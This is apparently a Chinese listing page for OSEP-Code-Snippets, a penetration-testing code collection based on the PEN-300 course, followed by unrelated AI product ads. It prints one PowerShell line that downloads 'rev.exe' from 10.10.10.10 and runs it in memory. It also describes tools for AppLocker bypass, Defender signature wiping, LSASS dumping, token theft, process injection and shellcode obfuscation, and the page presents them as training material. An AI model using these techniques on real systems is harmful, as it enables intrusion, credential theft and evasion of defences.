Project Icon

OSEP-Code-Snippets

OSEP课程相关的渗透测试代码片段库

OSEP-Code-Snippets是一个基于Offensive Security PEN-300课程的代码示例集合。项目包含AppLocker绕过、无文件横向移动和Linux shellcode编码器等渗透测试工具,使用C#、PowerShell、Python和VBA等语言实现。代码示例涉及shellcode运行、进程注入和令牌窃取等高级技术,为信息安全专业人士提供学习和实践资源。所有代码均按原样提供,不含任何形式的保证。

OSEP 代码片段

代码示例按原样提供,不附带任何形式的保证。基于 Offensive Security 的 PEN-300 课程。

类和方法都是公开的,所以大多数二进制文件应该允许如下反射加载。

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[rev.Program]::Main("".Split())

目录

片段名称描述
AppLocker 绕过 PowerShell 运行空间 (C#)使用 CertUtilBitsAdminInstallUtil 组合的 AppLocker 绕过基础二进制文件。详情请参阅 README.md
无文件横向移动 (C#)在远程主机上擦除 Windows Defender 签名,并使用类似 PSExec 的方法(但使用现有进程)实现横向移动。接受目标、目标服务和要运行的目标二进制文件的参数。注意应选择非关键服务,如 SensorService
Linux shellcode 编码器 (Python)用于从 Linux 编码 C# 有效载荷的实用脚本,可以接收原始 shellcode 有效载荷(.bin),或自动从 'msfvenom' 输入。支持使用任意密钥进行 XOR 和 ROT 编码,并打印解码函数。可用于替换 C# ROT/XOR 编码器脚本。
Linux shellcode 加载器 (C)各种基于 C 的 shellcode 加载器,包括用于库劫持的基础二进制文件。
MiniDump (C# & PS1)将 LSASS 转储到 C:\Windows\Tasks\lsass.dmp 的简单二进制文件。还提供了原生 PowerShell 脚本版本。
MSSQL (C#)包含各种讨论过的 MSSQL 交互的示例二进制文件。根据需要更改代码以仅包含所需内容。
PrintSpoofer.NET (C#)窃取使用 PrintSpooler 漏洞 强制传入的身份验证令牌,并使用该令牌运行给定的二进制文件。经修改后无需交互式登录会话。接受管道名称和要运行的二进制文件的参数。
ROT shellcode 编码器 (C#)应用最先进的 ROT 编码来混淆 shellcode 的简单二进制文件。接受旋转次数的参数。
Sections shellcode 进程注入器 (C#)使用 NtCreateSectionNtMapViewOfSectionNtUnMapViewOfsectionNtClose 而不是"标准"方法来注入和运行 shellcode。
Shellcode 进程虚化 (C#)虚化一个 svchost 进程并从那里运行 shellcode。在编写时在 VirusTotal 上得分为 0/68。
Shellcode 进程注入器 (C# & PS1)应用进程注入的简单 shellcode 运行器。接受要注入的进程参数。如果未给出参数,则尝试根据权限级别选择合适的进程。还提供了原生 PowerShell 脚本版本(虽然稍微简单一些)。
简单 Shellcode 运行器 (C# & PS1 & VBA)最简单的 shellcode 运行器。还提供了原生 PowerShell 和 VBA 脚本版本。
XOR shellcode 编码器 (C#)应用最先进的 XOR 编码来混淆 shellcode 的简单二进制文件。
项目侧边栏1项目侧边栏2
推荐项目
Project Cover

豆包MarsCode

豆包 MarsCode 是一款革命性的编程助手,通过AI技术提供代码补全、单测生成、代码解释和智能问答等功能,支持100+编程语言,与主流编辑器无缝集成,显著提升开发效率和代码质量。

Project Cover

AI写歌

Suno AI是一个革命性的AI音乐创作平台,能在短短30秒内帮助用户创作出一首完整的歌曲。无论是寻找创作灵感还是需要快速制作音乐,Suno AI都是音乐爱好者和专业人士的理想选择。

Project Cover

白日梦AI

白日梦AI提供专注于AI视频生成的多样化功能,包括文生视频、动态画面和形象生成等,帮助用户快速上手,创造专业级内容。

Project Cover

有言AI

有言平台提供一站式AIGC视频创作解决方案,通过智能技术简化视频制作流程。无论是企业宣传还是个人分享,有言都能帮助用户快速、轻松地制作出专业级别的视频内容。

Project Cover

Kimi

Kimi AI助手提供多语言对话支持,能够阅读和理解用户上传的文件内容,解析网页信息,并结合搜索结果为用户提供详尽的答案。无论是日常咨询还是专业问题,Kimi都能以友好、专业的方式提供帮助。

Project Cover

讯飞绘镜

讯飞绘镜是一个支持从创意到完整视频创作的智能平台,用户可以快速生成视频素材并创作独特的音乐视频和故事。平台提供多样化的主题和精选作品,帮助用户探索创意灵感。

Project Cover

讯飞文书

讯飞文书依托讯飞星火大模型,为文书写作者提供从素材筹备到稿件撰写及审稿的全程支持。通过录音智记和以稿写稿等功能,满足事务性工作的高频需求,帮助撰稿人节省精力,提高效率,优化工作与生活。

Project Cover

阿里绘蛙

绘蛙是阿里巴巴集团推出的革命性AI电商营销平台。利用尖端人工智能技术,为商家提供一键生成商品图和营销文案的服务,显著提升内容创作效率和营销效果。适用于淘宝、天猫等电商平台,让商品第一时间被种草。

Project Cover

AIWritePaper论文写作

AIWritePaper论文写作是一站式AI论文写作辅助工具,简化了选题、文献检索至论文撰写的整个过程。通过简单设定,平台可快速生成高质量论文大纲和全文,配合图表、参考文献等一应俱全,同时提供开题报告和答辩PPT等增值服务,保障数据安全,有效提升写作效率和论文质量。

投诉举报邮箱: service@vectorlightyear.com
@2024 懂AI·鲁ICP备2024100362号-6·鲁公网安备37021002001498号